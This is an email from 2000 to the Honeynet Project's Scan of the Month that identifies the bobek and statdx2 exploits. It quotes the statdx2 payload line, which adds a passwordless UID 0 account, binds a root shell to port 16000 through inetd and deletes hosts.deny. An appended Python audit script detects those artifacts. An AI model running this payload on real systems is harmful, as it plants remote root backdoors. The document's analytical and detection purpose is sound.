From bwoodfield@home.com Tue Dec 12 18:43:04 2000
Date: Tue, 12 Dec 2000 15:55:15 -0800
From: Brent Woodfield
To: project@honeynet.org
Subject: Scan of the Month

I'll tell you exactly what those two were. One was bobek v2 and the other was an auto-statdx2 script. I've seen them out in the wild too, but I believe the hackers are still calling it "ohday".

I was able to retrieve this line of code from that auto-statd script:

sprintf(slogin,"echo deamon:x:5000:5000:/user:/tmp:/bin/bash >> /etc/passwd; echo deamon:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412 >> /etc/shadow; echo iftp::10865:0:99999:7:-1:-1:134538460 >> /etc/shadow; echo iftp:x:0:0::/root:/bin/bash >> /etc/passwd; pwconv;echo 16000 stream tcp nowait root /usr/sbin/tcpd /bin/sh >> /etc/inetd.conf;rm -rf /etc/hosts.deny;killall -HUP inetd;");

The original version was named statdx2. I believe you can find it on http://packetstorm.securify.com

With that line among a couple other alterations, both of those exploits can be put into a simple script to auto compromise computers and save them in a log file.

Hope it helps.
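
Added example, not part of the original message or of either script: a host-side check for the four artifacts the quoted line leaves behind (a second UID 0 account, an empty shadow password, an inetd service that runs a shell, a deleted hosts.deny). The function name, the finding strings and the sample file contents are assumptions constructed for illustration; only the deamon, iftp and port 16000 lines come from the message.

```python
import os

SHELLS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh"}

def _rows(text, sep=None):
    """Yield the split fields of each non-blank, non-comment line."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield line.split(sep)

def audit(passwd, shadow, inetd, hosts_deny_present):
    """Return (file, entry, reason) tuples for backdoor-style entries."""
    findings = []
    for f in _rows(passwd, ":"):
        if len(f) >= 7 and f[2] == "0" and f[0] != "root":
            findings.append(("passwd", f[0], "UID 0 account other than root"))
    for f in _rows(shadow, ":"):
        if len(f) >= 2 and f[1] == "":
            findings.append(("shadow", f[0], "empty password field"))
    for f in _rows(inetd):
        # inetd.conf fields: service socktype proto wait user program [args...]
        if len(f) >= 6 and any(os.path.basename(p) in SHELLS for p in f[5:]):
            findings.append(("inetd.conf", f[0], "service spawns a shell as " + f[4]))
    if not hosts_deny_present:
        findings.append(("hosts.deny", "-", "file missing"))
    return findings

# Constructed sample files: one legitimate entry each, plus the lines
# the quoted sprintf() payload appends.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
deamon:x:5000:5000:/user:/tmp:/bin/bash
iftp:x:0:0::/root:/bin/bash
"""
SAMPLE_SHADOW = """\
root:*:10884:0:99999:7:::
deamon:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412
iftp::10865:0:99999:7:-1:-1:134538460
"""
SAMPLE_INETD = """\
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
16000 stream tcp nowait root /usr/sbin/tcpd /bin/sh
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_PASSWD, SAMPLE_SHADOW, SAMPLE_INETD, False):
        print("%-10s %-6s %s" % finding)
```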